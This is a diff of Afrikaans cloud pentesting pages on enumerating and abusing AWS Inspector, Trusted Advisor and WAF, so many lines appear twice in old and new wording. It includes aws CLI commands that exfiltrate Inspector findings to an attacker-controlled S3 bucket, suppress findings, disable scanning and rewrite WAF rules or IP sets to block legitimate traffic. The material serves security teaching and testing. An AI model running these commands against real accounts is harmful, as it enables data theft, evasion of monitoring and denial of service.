- **Verbeterde Skandering**: Hierdie opsie voeg die deurlopende skandeerfunksie by, benewens die op druk skandering. Verbeterde skandering delf dieper in die lae van elke houerbeeld om kwesbaarhede in OS-pakkette en in programmeringstaal pakkette met hoër akkuraatheid te identifiseer. Dit analiseer beide die basisbeeld en enige addisionele lae, wat 'n omvattende oorsig van potensiële sekuriteitskwessies bied.
#### Amazon Lambda functions scanning
Amazon Inspector sluit omvattende skandeervermoëns vir AWS Lambda-funksies en sy lae in, wat die sekuriteit en integriteit van serverless toepassings verseker. Inspector bied twee tipes skandering vir Lambda-funksies:
- **Lambda standaard skandering**: Hierdie standaard kenmerk identifiseer sagtewarekwesbaarhede in die toepassingspakket afhanklikhede wat by jou Lambda-funksie en lae gevoeg is. Byvoorbeeld, as jou funksie 'n weergawe van 'n biblioteek soos python-jwt met 'n bekende kwesbaarheid gebruik, genereer dit 'n bevinding.
- **Lambda kode skandering**: Analiseer aangepaste toepassingskode vir sekuriteitskwessies, wat kwesbaarhede soos inspuitingsfoute, datalekke, swak kriptografie, en ontbrekende enkripsie opspoor. Dit vang kode-snippets wat gedetecteerde kwesbaarhede uitlig, soos hardgecodeerde akrediteer. Bevindings sluit gedetailleerde herstelvoorstelle en kode-snippets vir die oplossing van die kwessies in.
- **Lambda standaard skandering**: Hierdie standaardfunksie identifiseer sagtewarekwesbaarhede in die toepassingspakket afhanklikhede wat by jou Lambda-funksie en lae gevoeg is. Byvoorbeeld, as jou funksie 'n weergawe van 'n biblioteek soos python-jwt met 'n bekende kwesbaarheid gebruik, genereer dit 'n bevinding.
- **Lambda kode skandering**: Analiseer aangepaste toepassingskode vir sekuriteitskwessies, wat kwesbaarhede soos inspuitingsfoute, datalekke, swak kriptografie, en ontbrekende enkripsie opspoor. Dit vang kode-snippets wat gedetecteerde kwesbaarhede uitlig, soos hardgecodeerde akrediteer. Bevindings sluit gedetailleerde herstelvoorstelle en kode-snippets in om die probleme op te los.
#### **Center for Internet Security (CIS) scans**
Amazon Inspector sluit CIS-skanderings in om Amazon EC2-instance bedryfstelsels teen beste praktyk aanbevelings van die Center for Internet Security (CIS) te benchmark. Hierdie skanderings verseker dat konfigurasies aan industrie-standaard sekuriteitsbaselines voldoen.
Amazon Inspector sluit CIS-skanderings in om Amazon EC2-instantie bedryfstelsels teen beste praktyk aanbevelings van die Center for Internet Security (CIS) te benchmark. Hierdie skanderings verseker dat konfigurasies aan industrie-standaard sekuriteitsbaselines voldoen.
- **Konfigurasie**: CIS-skanderings evalueer of stelsels se konfigurasies aan spesifieke CIS Benchmark aanbevelings voldoen, met elke kontrole wat aan 'n CIS kontrole-ID en titel gekoppel is.
- **Uitvoering**: Skanderings word uitgevoer of geskeduleer op grond van instance-tags en gedefinieerde skedules.
- **Resultate**: Na-skandeer resultate dui aan watter kontroles geslaag het, oorgeslaan is, of gefaal het, wat insig bied in die sekuriteitsposisie van elke instance.
- **Konfigurasie**: CIS-skanderings evalueer of stelsels se konfigurasies aan spesifieke CIS Benchmark-aanbevelings voldoen, met elke kontrole wat aan 'n CIS kontrole-ID en titel gekoppel is.
- **Uitvoering**: Skanderings word uitgevoer of geskeduleer op grond van instantie etikette en gedefinieerde skedules.
- **Resultate**: Na-skandeer resultate dui aan watter kontroles geslaag het, oorgeslaan is, of gefaal het, wat insig bied in die sekuriteitsposisie van elke instantie.
### Enumeration
```bash
@@ -185,13 +184,13 @@ aws inspector list-rules-packages
### Post Exploitation
> [!TIP]
> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om kwesbaarhede en netwerk blootstellings te vind wat hom kan help om ander instansies/tenks te kompromitteer.
> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om kwesbaarhede en netwerkblootstellings te vind wat hom kan help om ander instansies/tenks te kompromitteer.
>
> egter, 'n aanvaller kan ook belangstel om hierdie diens te ontwrig sodat die slagoffer nie kwesbaarhede kan sien nie (alle of spesifieke).
#### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport`
'n Aanvaller kan gedetailleerde verslae van kwesbaarhede of sagteware rekening van materiale (SBOMs) genereer en dit uit jou AWS omgewing uitvoer. Hierdie inligting kan benut word om spesifieke swakpunte, verouderde sagteware, of onveilige afhanklikhede te identifiseer, wat geteikende aanvalle moontlik maak.
'n Aanvaller kan gedetailleerde verslae van kwesbaarhede of sagtewarerekening van materiale (SBOMs) genereer en dit uit jou AWS-omgewing uitvoer. Hierdie inligting kan benut word om spesifieke swakpunte, verouderde sagteware of onveilige afhanklikhede te identifiseer, wat gerigte aanvalle moontlik maak.
```bash
# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
@@ -200,7 +199,7 @@ aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s
```
Die volgende voorbeeld toon hoe om al die Aktiewe bevindings van Amazon Inspector na 'n aanvaller-beheerde Amazon S3-bucket te eksfiltreer met 'n aanvaller-beheerde Amazon KMS-sleutel:
1. **Skep 'n Amazon S3-bucket** en heg 'n beleid daaraan om dit vanaf die slagoffer se Amazon Inspector toeganklik te maak:
1. **Skep 'n Amazon S3-bucket** en heg 'n beleid daaraan om dit vanaf die slagoffer Amazon Inspector toeganklik te maak:
```json
{
"Version": "2012-10-17",
@@ -257,15 +256,15 @@ Die volgende voorbeeld toon hoe om al die Aktiewe bevindings van Amazon Inspecto
]
}
```
3. Voer die opdrag uit om die **bevindinge verslag** te skep deur dit te eksfiltreer:
3. Voer die opdrag uit om **die bevindingsverslag** te skep deur dit te exfiltreer:
```bash
aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
```
- **Potensiële Impak**: Generasie en eksfiltrasie van gedetailleerde kwesbaarheid en sagteware verslae, insig verkry in spesifieke kwesbaarhede en sekuriteits swakhede.
- **Potensiële Impak**: Generasie en ekfiltrasie van gedetailleerde kwesbaarheid en sagteware verslae, insigte verkry in spesifieke kwesbaarhede en sekuriteits swakhede.
#### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport`
'n Aanvaller kan die generasie van die gespesifiseerde bevindingsverslag of SBOM-verslag kanselleer, wat verhoed dat sekuriteitspanne tydige inligting oor kwesbaarhede en sagteware faktuurlyste (SBOMs) ontvang, wat die opsporing en herstel van sekuriteitskwessies vertraag.
'n Aanvaller kan die generasie van die gespesifiseerde bevindingsverslag of SBOM-verslag kanselleer, wat verhoed dat sekuriteitspanne tydige inligting oor kwesbaarhede en sagteware rekening van materiale (SBOMs) ontvang, wat die opsporing en herstel van sekuriteitskwessies vertraag.
```bash
# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
@@ -276,7 +275,7 @@ aws inspector2 cancel-sbom-export --report-id <value>
#### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter`
'n Aanvaller met hierdie toestemmings sou in staat wees om die filtreringsreëls te manipuleer wat bepaal watter kwesbaarhede en sekuriteitskwessies gerapporteer of onderdruk word (as die **aksie** op SUPPRESS gestel is, sou 'n onderdrukkingsreël geskep word). Dit kan kritieke kwesbaarhede van sekuriteitsadministrateurs verberg, wat dit makliker maak om hierdie swakhede sonder opsporing te benut. Deur belangrike filters te verander of te verwyder, kan 'n aanvaller ook geraas skep deur die stelsel met irrelevante bevindings te oorstroom, wat effektiewe sekuriteitsmonitering en -reaksie belemmer.
'n Aanvaller met hierdie toestemmings sou in staat wees om die filterreëls te manipuleer wat bepaal watter kwesbaarhede en sekuriteitskwessies gerapporteer of onderdruk word (as die **aksie** op SUPPRESS gestel is, sou 'n onderdrukkingsreël geskep word). Dit kan kritieke kwesbaarhede van sekuriteitsadministrateurs verberg, wat dit makliker maak om hierdie swakhede sonder opsporing te benut. Deur belangrike filters te verander of te verwyder, kan 'n aanvaller ook geraas skep deur die stelsel met irrelevante bevindings te oorstroom, wat effektiewe sekuriteitsmonitering en -reaksie belemmer.
```bash
# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
@@ -295,7 +294,7 @@ aws inspector2 delete-filter --arn <value>
- Deur 'n ongeoorloofde administrateurrekening te aktiveer, kan 'n aanvaller sekuriteitskonfigurasies beheer, wat moontlik skandeer kan deaktiveer of instellings kan wysig om kwaadwillige aktiwiteite te verberg.
> [!WARNING]
> Dit is vereis dat die ongeoorloofde rekening in dieselfde Organisasie as die slagoffer wees om die gedelegeerde administrateur te word.
> Dit is vereis dat die ongeoorloofde rekening in dieselfde Organisasie as die slagoffer is om die gedelegeerde administrateur te word.
>
> Ten einde vir die ongeoorloofde rekening om die gedelegeerde administrateur te word, is dit ook vereis dat nadat die wettige gedelegeerde administrateur gedeaktiveer is, en voordat die ongeoorloofde rekening as die gedelegeerde administrateur geaktiveer word, die wettige administrateur as die gedelegeerde administrateur uit die organisasie moet word. Dit kan gedoen word met die volgende opdrag (**`organizations:DeregisterDelegatedAdministrator`** toestemming vereis): **`aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`**
```bash
@@ -308,7 +307,7 @@ aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <valu
#### `inspector2:AssociateMember`, `inspector2:DisassociateMember`
'n Aanvaller kan die assosiasie van lid rekeninge binne 'n Amazon Inspector-organisasie manipuleer. Deur ongeoorloofde rekeninge te assosieer of legitieme ones te disassosieer, kan 'n aanvaller beheer oor watter rekeninge ingesluit word in sekuriteitskanderings en verslagdoening. Dit kan lei tot kritieke rekeninge wat uitgesluit word van sekuriteitsmonitering, wat die aanvaller in staat stel om kwesbaarhede in daardie rekeninge te benut sonder opsporing.
'n Aanvaller kan die assosiasie van lid rekeninge binne 'n Amazon Inspector-organisasie manipuleer. Deur ongeoorloofde rekeninge te assosieer of legitieme te disassosieer, kan 'n aanvaller beheer oor watter rekeninge ingesluit word in sekuriteitskanderings en verslagdoening. Dit kan lei tot kritieke rekeninge wat uitgesluit word van sekuriteitsmonitering, wat die aanvaller in staat stel om kwesbaarhede in daardie rekeninge te benut sonder opsporing.
> [!WARNING]
> Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word.
@@ -318,14 +317,14 @@ aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>
```
- **Potensiële Impak**: Uitsluiting van sleutelrekeninge van sekuriteitsskande, wat ongekende uitbuiting van kwesbaarhede moontlik maak.
- **Potensiële Impak**: Uitsluiting van sleutelrekeninge uit sekuriteitsskande, wat ongekende uitbuiting van kwesbaarhede moontlik maak.
#### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`)
'n Aanvaller met die `inspector2:Disable` toestemming sal in staat wees om sekuriteitsskande op spesifieke hulpbron tipes (EC2, ECR, Lambda, Lambda kode) oor die gespesifiseerde rekeninge te deaktiveer, wat dele van die AWS omgewing onbeheerd en kwesbaar vir aanvalle laat. Daarbenewens, as gevolg van die **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** toestemmings, kan 'n aanvaller dan skande selektief heraktiveer om opsporing van verdagte konfigurasies te vermy.
'n Aanvaller met die `inspector2:Disable` toestemming sal in staat wees om sekuriteitsskande op spesifieke hulpbron tipes (EC2, ECR, Lambda, Lambda kode) oor die gespesifiseerde rekeninge te deaktiveer, wat dele van die AWS-omgewing onbeheerd en kwesbaar vir aanvalle laat. Daarbenewens, as gevolg van die **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** toestemmings, kan 'n aanvaller dan selektief skande heraktiveer om opsporing van verdagte konfigurasies te vermy.
> [!WARNING]
> Hierdie aksie vereis dat dit deur die gedelegeerde administrateur uitgevoer word.
> Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word.
```bash
# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
@@ -343,11 +342,11 @@ aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--acco
```bash
aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
```
- **Potensiële Impak**: Verander sekuriteitsskande-beleid en konfigurasies vir die organisasie.
- **Potensiële Impak**: Verander sekuriteitskande beleide en konfigurasies vir die organisasie.
#### `inspector2:TagResource`, `inspector2:UntagResource`
'n Aanvaller kan etikette op AWS Inspector hulpbronne manipuleer, wat krities is vir die organiseer, opspoor en outomatiseer van sekuriteitsassessering. Deur etikette te verander of te verwyder, kan 'n aanvaller potensieel kwesbaarhede van sekuriteitsskande verberg, nakomingsverslaggewing ontwrig, en inmeng met outomatiese herstelprosesse, wat lei tot onbeheerde sekuriteitskwessies en gecompromitteerde stelselintegriteit.
'n Aanvaller kan etikette op AWS Inspector hulpbronne manipuleer, wat krities is vir die organiseer, opspoor en outomatiseer van sekuriteitsassesseringe. Deur etikette te verander of te verwyder, kan 'n aanvaller potensieel kwesbaarhede van sekuriteitskande verberg, nakomingsverslaggewing ontwrig, en inmeng met outomatiese herstelprosesse, wat lei tot onbeheerde sekuriteitskwessies en gecompromitteerde stelselintegriteit.
```bash
aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>

4
src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
View File

@@ -1,7 +1,5 @@
# AWS - Trusted Advisor Enum
## AWS - Trusted Advisor Enum
{{#include ../../../../banners/hacktricks-training.md}}
## AWS Trusted Advisor Oorsig
@@ -62,7 +60,7 @@ Beperk tot gebruikers sonder besigheids- of ondernemingsondersteuningsplanne:
- Publieke sigbaarheid van EBS of RDS snapshots
- Swak of afwesige IAM wagwoordbeleide
AWS Trusted Advisor dien as 'n belangrike hulpmiddel om die optimalisering, prestasie, sekuriteit en fouttoleransie van AWS dienste te verseker op grond van gevestigde beste praktyke.
AWS Trusted Advisor dien as 'n belangrike hulpmiddel om die optimalisering, prestasie, sekuriteit en fouttoleransie van AWS-dienste te verseker op grond van gevestigde beste praktyke.
## **Verwysings**

60
src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
View File

@@ -1,7 +1,5 @@
# AWS - WAF Enum
## AWS - WAF Enum
{{#include ../../../../banners/hacktricks-training.md}}
## AWS WAF
@@ -12,13 +10,13 @@ AWS WAF is 'n **webtoepassing vuurmuur** wat ontwerp is om **webtoepassings of A
#### Web ACL (Toegang Beheerlys)
'n Web ACL is 'n versameling van reëls wat jy op jou webtoepassings of API's kan toepas. Wanneer jy 'n Web ACL met 'n hulpbron assosieer, ondersoek AWS WAF inkomende versoeke gebaseer op die reëls wat in die Web ACL gedefinieer is en neem die gespesifiseerde aksies.
'n Web ACL is 'n versameling reëls wat jy op jou webtoepassings of API's kan toepas. Wanneer jy 'n Web ACL met 'n hulpbron assosieer, ondersoek AWS WAF inkomende versoeke gebaseer op die reëls wat in die Web ACL gedefinieer is en neem die gespesifiseerde aksies.
#### Reëlgroep
'n Reëlgroep is 'n herbruikbare versameling van reëls wat jy op verskeie Web ACLs kan toepas. Reëlgroepe help om konsekwente reëlstelle oor verskillende webtoepassings of API's te bestuur en te onderhou.
'n Reëlgroep is 'n herbruikbare versameling reëls wat jy op verskeie Web ACLs kan toepas. Reëlgroepe help om konsekwente reëlstelle oor verskillende webtoepassings of API's te bestuur en te onderhou.
Elke reëlgroep het sy geassosieerde **kapasiteit**, wat help om die bedryfsbronne wat gebruik word om jou reëls, reëlgroepe en web ACLs te laat loop, te bereken en te beheer. Sodra die waarde tydens die skepping gestel is, is dit nie moontlik om dit te wysig nie.
Elke reëlgroep het sy eie **kapasiteit**, wat help om die bedryfsbronne wat gebruik word om jou reëls, reëlgroepe en web ACLs te bestuur, te bereken en te beheer. Sodra die waarde tydens die skepping gestel is, is dit nie moontlik om dit te wysig nie.
#### Reël
@@ -41,11 +39,11 @@ AWS WAF bied vooraf-gekonfigureerde, geverifieerde reëlstelle wat deur AWS en A
#### Lock Token
'n Lock Token word gebruik vir gelyktydige beheer wanneer daar opdaterings aan WAF-hulpbronne gemaak word. Dit verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie.
'n Lock Token word gebruik vir mededingingsbeheer wanneer opdaterings aan WAF-hulpbronne gemaak word. Dit verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie.
#### API Sleutels
API Sleutels in AWS WAF word gebruik om versoeke na sekere API operasies te verifieer. Hierdie sleutels is versleuteld en veilig bestuur om toegang te beheer en te verseker dat slegs gemagtigde gebruikers veranderinge aan WAF-konfigurasies kan maak.
API Sleutels in AWS WAF word gebruik om versoeke na sekere API operasies te verifieer. Hierdie sleutels is versleuteld en veilig bestuur om toegang te beheer en te verseker dat slegs gemagtigde gebruikers veranderinge aan WAF-konfigurasies kan aanbring.
- **Voorbeeld**: Integrasie van die CAPTCHA API.
@@ -55,16 +53,16 @@ API Sleutels in AWS WAF word gebruik om versoeke na sekere API operasies te veri
#### Bereik
Die bereikparameter in AWS WAF spesifiseer of die WAF-reëls en konfigurasies van toepassing is op 'n streeks toepassing of 'n Amazon CloudFront verspreiding.
Die bereik parameter in AWS WAF spesifiseer of die WAF reëls en konfigurasies van toepassing is op 'n streeks toepassing of 'n Amazon CloudFront verspreiding.
- **REGIONAL**: Geld vir streeksdienste soos Toepassing Laai Balansers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito gebruikerspoel, AWS App Runner diens en AWS Verified Access instansie. Jy spesifiseer die AWS streek waar hierdie hulpbronne geleë is.
- **CLOUDFRONT**: Geld vir Amazon CloudFront verspreidings, wat globaal is. WAF-konfigurasies vir CloudFront word bestuur deur die `us-east-1` streek ongeag waar die inhoud bedien word.
- **REGIONAL**: Geld vir streeksdienste soos Toepassing Laai Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito gebruikerspoel, AWS App Runner diens en AWS Verified Access instansie. Jy spesifiseer die AWS streek waar hierdie hulpbronne geleë is.
- **CLOUDFRONT**: Geld vir Amazon CloudFront verspreidings, wat globaal is. WAF konfigurasies vir CloudFront word bestuur deur die `us-east-1` streek ongeag waar die inhoud bedien word.
### Sleutelkenmerke
#### Monitering Kriteria (Voorwaardes)
**Voorwaardes** spesifiseer die elemente van inkomende HTTP/HTTPS versoeke wat AWS WAF moniteer, wat XSS, geografiese ligging (GEO), IP-adresse, Grootte beperkings, SQL-inspuiting, en patrone (stringe en regex ooreenkoms) insluit. Dit is belangrik om te noem dat **versoeke wat op die CloudFront vlak op grond van land beperk is, nie WAF sal bereik nie**.
**Voorwaardes** spesifiseer die elemente van inkomende HTTP/HTTPS versoeke wat AWS WAF monitor, wat XSS, geografiese ligging (GEO), IP-adresse, Grootte beperkings, SQL-inspuiting, en patrone (stringe en regex ooreenkomste) insluit. Dit is belangrik om te noem dat **versoeke wat op die CloudFront vlak op grond van land beperk is, nie WAF sal bereik nie**.
Elke AWS rekening kan konfigureer:
@@ -77,16 +75,16 @@ Elke AWS rekening kan konfigureer:
Aksies word aan elke reël toegeken, met opsies soos:
- **Toelaat**: Die versoek word na die toepaslike CloudFront verspreiding of Toepassing Laai Balanser gestuur.
- **Toelaat**: Die versoek word na die toepaslike CloudFront verspreiding of Toepassing Laai Balancer gestuur.
- **Blokkeer**: Die versoek word onmiddellik beëindig.
- **Tel**: Tel die versoeke wat aan die reël se voorwaardes voldoen. Dit is nuttig vir reëltoetsing, om die akkuraatheid van die reël te bevestig voordat dit op Toelaat of Blokkeer gestel word.
- **CAPTCHA en Uitdaging:** Dit word geverifieer dat die versoek nie van 'n bot afkomstig is nie deur middel van CAPTCHA legkaarte en stille uitdagings.
- **CAPTCHA en Uitdaging:** Dit word geverifieer dat die versoek nie van 'n bot kom nie deur CAPTCHA legkaarte en stille uitdagings.
As 'n versoek nie aan enige reël binne die Web ACL voldoen nie, ondergaan dit die **standaard aksie** (Toelaat of Blokkeer). Die volgorde van reël uitvoering, wat binne 'n Web ACL gedefinieer is, is belangrik en volg tipies hierdie volgorde:
1. Toelaat Witlys IP's.
2. Blokkeer Swartlys IP's.
3. Blokkeer versoeke wat aan enige nadelige handtekeninge voldoen.
3. Blokkeer versoeke wat enige nadelige handtekeninge ooreenstem.
#### CloudWatch Integrasie
@@ -188,17 +186,17 @@ aws wafv2 get-mobile-sdk-release --platform <value> --release-version <value>
### Post Exploitation / Bypass
> [!TIP]
> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om WAF-beskermings en netwerkblootstellings te identifiseer wat hom kan help om ander webwerwe te kompromitteer.
> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om WAF beskermings en netwerk blootstellings te identifiseer wat hom kan help om ander webwerwe te kompromitteer.
>
> egter, 'n aanvaller kan ook belangstel om hierdie diens te ontwrig sodat die webwerwe nie deur die WAF beskerm word nie.
In baie van die Verwyder en Opdateer operasies sal dit nodig wees om die **lock token** te verskaf. Hierdie token word gebruik vir mededingingsbeheer oor die hulpbronne, wat verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie. Om hierdie token te verkry, kan jy die ooreenstemmende **list** of **get** operasies oor die spesifieke hulpbron uitvoer.
In baie van die Verwyder en Opdateer operasies sal dit nodig wees om die **lock token** te verskaf. Hierdie token word gebruik vir mededingingsbeheer oor die hulpbronne, wat verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie. Om hierdie token te verkry, kan jy die ooreenstemmende **lys** of **kry** operasies oor die spesifieke hulpbron uitvoer.
#### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`**
'n Aanvaller sal in staat wees om die sekuriteit van die geraakte hulpbron te kompromitteer deur:
- Reëlgroepe te skep wat byvoorbeeld legitieme verkeer van legitieme IP-adresse kan blokkeer, wat 'n ontkenning van diens veroorsaak.
- Reëlgroepe te skep wat byvoorbeeld legitieme verkeer van legitieme IP adresse kan blokkeer, wat 'n ontkenning van diens veroorsaak.
- Reëlgroepe op te dateer, wat in staat is om sy aksies te verander byvoorbeeld van **Block** na **Allow**.
- Reëlgroepe te verwyder wat kritieke sekuriteitsmaatreëls bied.
```bash
@@ -237,14 +235,14 @@ Die **rule.json** lêer sal soos volg lyk:
}
]
```
**Potensiële Impak**: Ongeoorloofde toegang, datalekke, en potensiële DoS-aanvalle.
**Potensiële Impak**: Onbevoegde toegang, datalekke, en potensiële DoS-aanvalle.
#### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`**
Met hierdie toestemmings kan 'n aanvaller:
- 'n Nuwe Web ACL skep, wat reëls bekendstel wat of kwaadwillige verkeer toelaat of legitieme verkeer blokkeer, wat die WAF effektief nutteloos maak of 'n diensontkenning veroorsaak.
- Bestaande Web ACL's opdateer, in staat om reëls te wysig om aanvalle soos SQL-inspuiting of kruis-web scripting toe te laat, wat voorheen geblokkeer was, of normale verkeersvloei te ontwrig deur geldige versoeke te blokkeer.
- Bestaande Web ACLs opdateer, in staat om reëls te wysig om aanvalle soos SQL-inspuiting of kruis-web scripting toe te laat, wat voorheen geblokkeer was, of normale verkeersvloei te ontwrig deur geldige versoeke te blokkeer.
- 'n Web ACL verwyder, wat die betrokke hulpbronne heeltemal onbeskermd laat, en dit blootstel aan 'n wye reeks webaanvalle.
> [!NOTE]
@@ -259,9 +257,9 @@ aws wafv2 update-web-acl --name <value> --id <value> --default-action <value> --
# Delete Web ACL
aws wafv2 delete-web-acl --name <value> --id <value> --lock-token <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
```
Die volgende voorbeelde wys hoe om 'n Web ACL op te dateer om die legitieme verkeer van 'n spesifieke IP stel te blokkeer. As die oorspronklike IP nie met enige van daardie IP's ooreenstem nie, sal die standaardaksie ook wees om dit te blokkeer, wat 'n DoS veroorsaak.
Die volgende voorbeelde toon hoe om 'n Web ACL op te dateer om die legitieme verkeer van 'n spesifieke IP-stel te blokkeer. As die oorspronklike IP nie met enige van daardie IP's ooreenstem nie, sal die standaardaksie ook wees om dit te blokkeer, wat 'n DoS veroorsaak.
**Oorspronklike Web ACL**:
**Originele Web ACL**:
```json
{
"WebACL": {
@@ -333,9 +331,9 @@ Die **rule.json** lêer sal soos volg lyk:
#### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`**
Die **`wafv2:AssociateWebACL`** toestemming sou 'n aanvaller in staat stel om web ACLs (Toegangsbeheerlisensies) met hulpbronne te assosieer, wat dit moontlik maak om sekuriteitsbeheermaatreëls te omseil, wat onbevoegde verkeer toelaat om die toepassing te bereik, wat potensieel kan lei tot ontploffings soos SQL-inspuiting of kruis-webskripting (XSS). Omgekeerd, met die **`wafv2:DisassociateWebACL`** toestemming, kan die aanvaller tydelik sekuriteitsbeskermings deaktiveer, wat die hulpbronne aan kwesbaarhede blootstel sonder opsporing.
Die **`wafv2:AssociateWebACL`** toestemming sal 'n aanvaller in staat stel om web ACLs (Toegang Beheer Lyste) met hulpbronne te assosieer, wat dit moontlik maak om sekuriteitsbeheermaatreëls te omseil, wat onbevoegde verkeer toelaat om die aansoek te bereik, wat potensieel kan lei tot ontploffings soos SQL-inspuiting of kruis-web scripting (XSS). Omgekeerd, met die **`wafv2:DisassociateWebACL`** toestemming, kan die aanvaller tydelik sekuriteitsbeskermings deaktiveer, wat die hulpbronne aan kwesbaarhede blootstel sonder opsporing.
Die addisionele toestemmings sou benodig word, afhangende van die tipe beskermde hulpbron:
Die addisionele toestemmings sal benodig word, afhangende van die tipe beskermde hulpbron:
- **Assosieer**
- apigateway:SetWebACL
@@ -357,11 +355,11 @@ aws wafv2 associate-web-acl --web-acl-arn <value> --resource-arn <value>
# Disassociate
aws wafv2 disassociate-web-acl --resource-arn <value>
```
**Potensiële Impak**: Gecompromitteerde hulpbronsekuriteit, verhoogde risiko van eksploitatie, en potensiële diensonderbrekings binne AWS-omgewings wat deur AWS WAF beskerm word.
**Potensiële Impak**: Gecompromitteerde hulpbronne sekuriteit, verhoogde risiko van eksploitatie, en potensiële diensonderbrekings binne AWS omgewings wat deur AWS WAF beskerm word.
#### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`**
'n Aanvaller sou in staat wees om die IP-selle wat deur AWS WAF bestuur word, te skep, op te dateer en te verwyder. Dit kan gevaarlik wees aangesien dit nuwe IP-selle kan skep om kwaadwillige verkeer toe te laat, IP-selle kan wysig om wettige verkeer te blokkeer, bestaande IP-selle kan opdateer om kwaadwillige IP-adresse in te sluit, vertroude IP-adresse kan verwyder of kritieke IP-selle kan verwyder wat bedoel is om kritieke hulpbronne te beskerm.
'n Aanvaller sal in staat wees om die IP stelle wat deur AWS WAF bestuur word, te skep, op te dateer en te verwyder. Dit kan gevaarlik wees aangesien dit nuwe IP stelle kan skep om kwaadwillige verkeer toe te laat, IP stelle kan wysig om wettige verkeer te blokkeer, bestaande IP stelle kan opdateer om kwaadwillige IP adresse in te sluit, vertroude IP adresse kan verwyder of kritieke IP stelle kan verwyder wat bedoel is om kritieke hulpbronne te beskerm.
```bash
# Create IP set
aws wafv2 create-ip-set --name <value> --ip-address-version <IPV4 | IPV6> --addresses <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1>
@@ -374,7 +372,7 @@ Die volgende voorbeeld toon hoe om **die bestaande IP stel te oorskryf met die g
```bash
aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1
```
**Potensiële Impak**: Ongeoorloofde toegang en blokkering van legitieme verkeer.
**Potensiële Impak**: Onbevoegde toegang en blokkering van legitieme verkeer.
#### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`**
@@ -382,7 +380,7 @@ aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a
- Die skep van nuwe regex patrone sou 'n aanvaller help om skadelike inhoud toe te laat
- Deur die bestaande patrone op te dateer, sou 'n aanvaller die sekuriteitsreëls kon omseil
- Die verwydering van patrone wat ontwerp is om kwaadwillige aktiwiteite te blokkeer, kan 'n aanvaller lei om kwaadwillige payloads te stuur en die sekuriteitsmaatreëls te omseil.
- Die verwydering van patrone wat ontwerp is om kwaadwillige aktiwiteite te blokkeer, kan 'n aanvaller in staat stel om kwaadwillige payloads te stuur en die sekuriteitsmaatreëls te omseil.
```bash
# Create regex pattern set
aws wafv2 create-regex-pattern-set --name <value> --regular-expression-list <value> --scope <REGIONAL --region=<value> | CLOUDFRONT --region=us-east-1> [--description <value>]
@@ -395,12 +393,12 @@ aws wafv2 delete-regex-pattern-set --name <value> --scope <REGIONAL --region=<va
#### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`**
